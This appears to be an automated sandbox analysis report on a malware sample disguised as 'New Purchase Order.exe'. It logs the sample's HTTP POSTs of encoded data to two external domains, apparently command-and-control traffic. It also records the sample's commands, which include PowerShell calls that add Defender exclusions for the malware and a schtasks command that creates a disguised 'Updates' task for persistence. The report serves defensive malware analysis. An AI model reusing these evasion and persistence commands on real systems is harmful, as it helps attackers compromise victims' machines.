                        Sep 9, 2024 04:54:18.700619936 CEST1127INData Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e
                        Data Ascii: <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        39192.168.2.449781162.240.81.18802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:54:20.704771996 CEST10882OUTPOST /3i7y/ HTTP/1.1
                        Host: www.sorriragora.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.sorriragora.online
                        Referer: http://www.sorriragora.online/3i7y/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 32 38 65 4f 6b 71 71 71 72 52 58 2f 6a 6b 54 66 58 56 74 79 34 36 42 75 6f 70 30 43 6f 77 58 6f 73 6e 76 4b 66 4d 4b 62 4c 56 61 46 72 49 35 65 74 73 59 5a 35 6b 6d 76 4c 51 68 4a 4c 30 44 51 36 65 38 48 31 39 6f 58 31 69 76 66 33 31 53 74 7a 59 62 31 30 34 54 36 6b 69 59 51 49 54 43 52 6e 6b 65 6a 51 33 78 39 4a 36 56 56 45 37 53 64 34 6d 4b 68 6a 6f 37 52 52 34 47 30 75 38 70 4b 48 4e 52 6c 75 70 43 63 2b 42 52 78 62 32 56 4a 69 4c 6f 48 30 31 74 39 73 76 76 57 4b 49 48 51 50 4a 57 45 41 53 35 47 5a 75 38 4e 32 77 7a 4a 70 6f 54 75 76 30 39 48 45 52 48 73 49 31 45 62 52 6c 41 45 79 59 63 33 63 30 45 72 46 6d 6c 56 47 49 59 68 44 4f 4d 52 6f 63 2b 63 48 70 37 53 68 6f 41 34 2f 48 79 78 73 59 47 52 54 56 45 74 38 36 59 57 54 64 33 45 6d 4b 58 75 41 6f 67 37 65 56 38 4c 6a 73 64 44 6c 72 76 67 69 4a 35 6f 46 64 79 37 41 50 78 36 56 61 53 56 44 52 4d 56 75 45 49 45 57 76 69 2f 32 45 77 4d 6f 4f 79 59 59 62 65 44 70 68 76 47 2b 4c 2b 41 4b 56 36 4e 4c 47 57 49 63 74 65 7a 41 70 49 5a 52 51 4b [TRUNCATED]
                        Data Ascii: lt=28eOkqqqrRX/jkTfXVty46Buop0CowXosnvKfMKbLVaFrI5etsYZ5kmvLQhJL0DQ6e8H19oX1ivf31StzYb104T6kiYQITCRnkejQ3x9J6VVE7Sd4mKhjo7RR4G0u8pKHNRlupCc+BRxb2VJiLoH01t9svvWKIHQPJWEAS5GZu8N2wzJpoTuv09HERHsI1EbRlAEyYc3c0ErFmlVGIYhDOMRoc+cHp7ShoA4/HyxsYGRTVEt86YWTd3EmKXuAog7eV8LjsdDlrvgiJ5oFdy7APx6VaSVDRMVuEIEWvi/2EwMoOyYYbeDphvG+L+AKV6NLGWIctezApIZRQKadEAzxVAybLujFQBdNt8O31akTJilnbYJV0DRSbYcBQaYwtgwYbelvPpHcUvVPFfp07p2GrLRaa/HiFU+Ky3jfFfvV6lzgFqmtcpFqs5c25OHwDQJc+choV0Z7+qA+may6XXahbzqWj8p4ew3vYZsBjbQ8FD6MDx279sz+aYSANbfiMBRQwq0PLIjvMakghdOaJ7hOZ5v+nDuvbeKaYE4Cwcm/edKSj6/7Y0kff3Xn2+J08bbqp5DfMn1RszSQzeaTEXWI99OLZE/TNMV4UiuIyuvRqC5EgXdOYcbgMTqNqut3TCUbkGdV2Mi6PMJKNwqjXaswNvEU7edCsG7B3d8jnbUdNmS4LcSYX6V+yAZKbkn5CFqeifSHMdC0e4NKdP1ZHax29h9LlPVDwmfE+JL9dkWR6uH1ABOIThefTOt0363hKhkrVFba9Qez5m/EQ7EvB528NrNYsN4w2LK2mdQ4CqhCdj9NmXRqC7QAwd27yfJ3Z7UBabIhF6A+CfJOr8kwcDVC7KdvQAblIxC8wI4LVy4DM6PECyQ2rEEKaqQFOYkgGz+n1F6sSkqkFXaWwwUZtUsjXI5K2Ccog1au9rSVTE2Yq2nWsY/u4vMKGW1q6hU7nmNSqmO0QTp2cHXoCr5alxf0JcXUX+yQhqIy4iGS5kyhaNWbmJFa [TRUNCATED]
                        Sep 9, 2024 04:54:21.251007080 CEST1236INHTTP/1.1 404 Not Found
                        Server: nginx/1.20.1
                        Date: Mon, 09 Sep 2024 02:54:21 GMT
                        Content-Type: text/html
                        Content-Length: 3650
                        Connection: close
                        ETag: "663a05b6-e42"
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                        Sep 9, 2024 04:54:21.251023054 CEST224INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
                        Sep 9, 2024 04:54:21.251034975 CEST1236INData Raw: 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 43 36 45 42 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                        Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294172;
                        Sep 9, 2024 04:54:21.251046896 CEST224INData Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e
                        Data Ascii: <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distr
                        Sep 9, 2024 04:54:21.256911039 CEST903INData Raw: 69 62 75 74 65 64 20 77 69 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 46 65 64 6f 72 61 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 74 3e 2f 75 73
                        Data Ascii: ibuted with Fedora. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>error_pag


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        40192.168.2.449782162.240.81.18802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:54:23.242863894 CEST499OUTGET /3i7y/?lt=7+2uneOBixDDmhLFRXF/ufkAm5AC1SXFsWvwANuZC0TQ0YERrtM9rlugcy5pD3j7o6sEidpw3wSWmiKn6bu88qr2mjlQFSGqmkD6eyB8L9Z0Lf+o3Q/3u6k=&3ry=nj20Xr HTTP/1.1
                        Host: www.sorriragora.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:54:23.800533056 CEST1236INHTTP/1.1 404 Not Found
                        Server: nginx/1.20.1
                        Date: Mon, 09 Sep 2024 02:54:23 GMT
                        Content-Type: text/html
                        Content-Length: 3650
                        Connection: close
                        ETag: "663a05b6-e42"
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                        Sep 9, 2024 04:54:23.800549984 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                        Sep 9, 2024 04:54:23.800561905 CEST448INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                        Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                        Sep 9, 2024 04:54:23.800574064 CEST903INData Raw: 69 62 75 74 65 64 20 77 69 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 46 65 64 6f 72 61 2e 20 20 49 74 20 69 73 20 6c 6f 63 61 74 65 64 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 74 3e 2f 75 73
                        Data Ascii: ibuted with Fedora. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>error_pag


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        41192.168.2.44978354.183.209.210802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:54:28.862247944 CEST765OUTPOST /6ua2/ HTTP/1.1
                        Host: www.jyourwd.store
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.jyourwd.store
                        Referer: http://www.jyourwd.store/6ua2/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 63 4d 49 6c 4e 51 49 41 7a 37 77 58 4d 63 61 4a 61 35 52 38 34 77 4d 64 6b 50 42 4a 79 6f 46 2f 70 68 4c 43 31 33 55 74 4b 41 56 76 38 2f 57 63 6b 32 53 6a 76 41 38 71 6f 63 47 47 79 42 4a 73 49 4c 6c 72 48 38 43 67 64 4b 2f 56 6e 4b 49 43 70 2f 77 55 4c 58 4c 75 39 68 4f 52 58 36 43 7a 70 75 38 6d 45 64 6f 4f 7a 5a 79 70 66 30 73 75 72 53 4f 32 67 76 7a 6d 49 2f 68 4b 71 49 78 5a 46 50 69 70 33 31 75 52 52 68 6b 48 34 52 75 2b 46 49 79 6a 58 74 58 61 6f 65 2b 72 4e 39 4a 5a 45 63 77 61 67 6c 49 6d 42 7a 42 62 48 63 74 4e 78 76 65 56 75 4e 4f 6f 72 58 65 56 75 52 72 33 62 67 3d 3d
                        Data Ascii: lt=cMIlNQIAz7wXMcaJa5R84wMdkPBJyoF/phLC13UtKAVv8/Wck2SjvA8qocGGyBJsILlrH8CgdK/VnKICp/wULXLu9hORX6Czpu8mEdoOzZypf0surSO2gvzmI/hKqIxZFPip31uRRhkH4Ru+FIyjXtXaoe+rN9JZEcwaglImBzBbHctNxveVuNOorXeVuRr3bg==


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        42192.168.2.44978454.183.209.210802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:54:31.405862093 CEST785OUTPOST /6ua2/ HTTP/1.1
                        Host: www.jyourwd.store
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.jyourwd.store
                        Referer: http://www.jyourwd.store/6ua2/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 63 4d 49 6c 4e 51 49 41 7a 37 77 58 4e 38 71 4a 4b 6f 52 38 74 67 4d 43 39 2f 42 4a 37 49 46 37 70 68 33 43 31 7a 4d 39 4a 79 68 76 38 65 6d 63 6c 33 53 6a 75 41 38 71 6a 38 47 44 38 68 4a 33 49 4c 67 59 48 35 71 67 64 4b 37 56 6e 50 4d 43 71 50 4d 54 4c 48 4c 73 6b 78 4f 58 49 71 43 7a 70 75 38 6d 45 65 56 56 7a 5a 71 70 66 41 51 75 72 32 53 35 38 2f 7a 6c 65 76 68 4b 39 59 78 43 46 50 69 66 33 77 50 2b 52 6a 73 48 34 51 65 2b 47 63 65 67 4f 64 58 51 6e 2b 2f 35 63 2f 63 4e 4e 74 46 6b 74 30 63 71 4f 58 64 32 47 61 38 58 67 65 2f 43 38 4e 71 62 32 51 58 68 6a 53 57 2b 41 67 78 36 6f 6b 35 44 49 64 56 4a 5a 39 71 38 44 53 78 2f 79 55 34 3d
                        Data Ascii: lt=cMIlNQIAz7wXN8qJKoR8tgMC9/BJ7IF7ph3C1zM9Jyhv8emcl3SjuA8qj8GD8hJ3ILgYH5qgdK7VnPMCqPMTLHLskxOXIqCzpu8mEeVVzZqpfAQur2S58/zlevhK9YxCFPif3wP+RjsH4Qe+GcegOdXQn+/5c/cNNtFkt0cqOXd2Ga8Xge/C8Nqb2QXhjSW+Agx6ok5DIdVJZ9q8DSx/yU4=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        43192.168.2.44978554.183.209.210802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:54:33.948301077 CEST10867OUTPOST /6ua2/ HTTP/1.1
                        Host: www.jyourwd.store
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.jyourwd.store
                        Referer: http://www.jyourwd.store/6ua2/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 63 4d 49 6c 4e 51 49 41 7a 37 77 58 4e 38 71 4a 4b 6f 52 38 74 67 4d 43 39 2f 42 4a 37 49 46 37 70 68 33 43 31 7a 4d 39 4a 79 5a 76 38 6f 53 63 6a 51 2b 6a 30 41 38 71 2f 4d 47 43 38 68 4a 36 49 4c 59 55 48 35 75 65 64 4a 50 56 32 5a 77 43 72 39 6f 54 42 48 4c 73 35 68 4f 57 58 36 44 7a 70 76 4d 36 45 65 46 56 7a 5a 71 70 66 42 41 75 37 79 4f 35 2b 2f 7a 6d 49 2f 67 46 71 49 77 74 46 4f 47 68 33 77 44 55 53 53 4d 48 2f 7a 32 2b 57 35 79 67 52 74 58 57 6b 2b 2b 38 63 2f 41 37 4e 74 59 56 74 30 70 46 4f 51 31 32 43 4f 6f 4a 39 71 4c 57 76 4f 53 78 6c 53 48 78 36 77 53 66 4a 42 34 46 6d 33 68 2b 4d 4e 52 51 58 76 4c 43 56 58 6c 61 78 43 5a 35 69 4f 63 6c 37 43 2b 4a 55 4c 35 78 4c 7a 7a 36 38 45 45 31 30 45 30 33 31 75 45 6f 2f 77 2f 5a 30 43 46 65 53 48 6f 68 43 74 39 74 44 4e 42 75 4e 2f 2f 68 58 77 2f 4e 4f 45 65 62 55 46 47 38 61 56 69 36 55 2f 7a 69 4c 4e 6c 54 47 41 4b 5a 66 47 76 42 44 59 69 51 38 6f 4e 77 46 2f 73 51 54 67 68 30 69 52 43 4c 6c 36 6b 45 51 72 42 45 4b 4d 50 68 59 77 56 [TRUNCATED]
                        Data Ascii: lt=cMIlNQIAz7wXN8qJKoR8tgMC9/BJ7IF7ph3C1zM9JyZv8oScjQ+j0A8q/MGC8hJ6ILYUH5uedJPV2ZwCr9oTBHLs5hOWX6DzpvM6EeFVzZqpfBAu7yO5+/zmI/gFqIwtFOGh3wDUSSMH/z2+W5ygRtXWk++8c/A7NtYVt0pFOQ12COoJ9qLWvOSxlSHx6wSfJB4Fm3h+MNRQXvLCVXlaxCZ5iOcl7C+JUL5xLzz68EE10E031uEo/w/Z0CFeSHohCt9tDNBuN//hXw/NOEebUFG8aVi6U/ziLNlTGAKZfGvBDYiQ8oNwF/sQTgh0iRCLl6kEQrBEKMPhYwVz05BSlEQfFsP4NVtxMGqfdOgS8gqGM8wvb88MHHhDlL//zP2l/5roEmGKf4TwXqzB+wLm/dfRG0sp5XtXwe9yAsgYnjD8PfXt2q6prvkd0WY2ytLAzOcrxTIAEDo9fAplQk9AHaOq2ZZpB5RdudId2Zbr0LwMNUFe25XfGjngR8mNAaWfg1JMbCc1A9jjjOBT2DJk10RivAOO+gISKTupiLnhK3F7tUu4gnGvNnvcbY1asZDG2lGN+Ym7Uai9ur3XkklAd5UMl5ie6YNht4xuOQmU2iMuS7luxuMbq8+D6BU3TzgZF7hFhGWuIApc7/PfIYtyTX5SgzfYQXJwu2yH9jx/Z2nJ2NmQ9MjViHjHqCTsQU3ioAORyngHQWLeQ6ozK3YIhWi/jgupm1FCOVmVlhuziiWzFcj5952BlL3f+WjT/UKEp3lQHZwK+iKNY6AlUkl4MMTig3Z6iOJL8yyGSV+nNiIa0D1HVzvMneGRWovBtEWkYjyWuIPWcnydDkx4TjLqwEYYfEvU7/gTTNZnpJ5HmjkUpptMAflPF7oisLIjLjKko9ej1tVEMrDw3xvYYCyY4nQGYbZ9rECFGGSDpqjNWdwbrFr2JrZnmMezd1rsGZskm1E/mOZCxoyjIVA9rkpdeukdF+lx6vgI9wHpfnL7FFiwRA/z5 [TRUNCATED]


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        44192.168.2.44978654.183.209.210802132C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        TimestampBytes transferredDirectionData
                        Sep 9, 2024 04:54:36.489538908 CEST494OUTGET /6ua2/?3ry=nj20Xr&lt=ROgFOn87xawaO6SZL50JuAl1kKxTrphupTX70ShDOCtjrPizjlCh9yM4paCu7ldqJbY3adTxPonHhY9dmNlpIFS90RvvBYO2gPQCKrVy+PqJYkpukQev2c8= HTTP/1.1
                        Host: www.jyourwd.store
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:22:50:53
                        Start date:08/09/2024
                        Path:C:\Users\user\Desktop\New Purchase Order.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\New Purchase Order.exe"
                        Imagebase:0x5d0000
                        File size:693'248 bytes
                        MD5 hash:9EF9CFFB40D3911E46CB798DAA08B46F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:2
                        Start time:22:50:54
                        Start date:08/09/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"
                        Imagebase:0x7e0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:3
                        Start time:22:50:54
                        Start date:08/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:4
                        Start time:22:50:55
                        Start date:08/09/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
                        Imagebase:0x7e0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:5
                        Start time:22:50:55
                        Start date:08/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:6
                        Start time:22:50:55
                        Start date:08/09/2024
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp"
                        Imagebase:0x2d0000
                        File size:187'904 bytes
                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:7
                        Start time:22:50:55
                        Start date:08/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:8
                        Start time:22:50:55
                        Start date:08/09/2024
                        Path:C:\Users\user\Desktop\New Purchase Order.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\New Purchase Order.exe"
                        Imagebase:0x630000
                        File size:693'248 bytes
                        MD5 hash:9EF9CFFB40D3911E46CB798DAA08B46F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
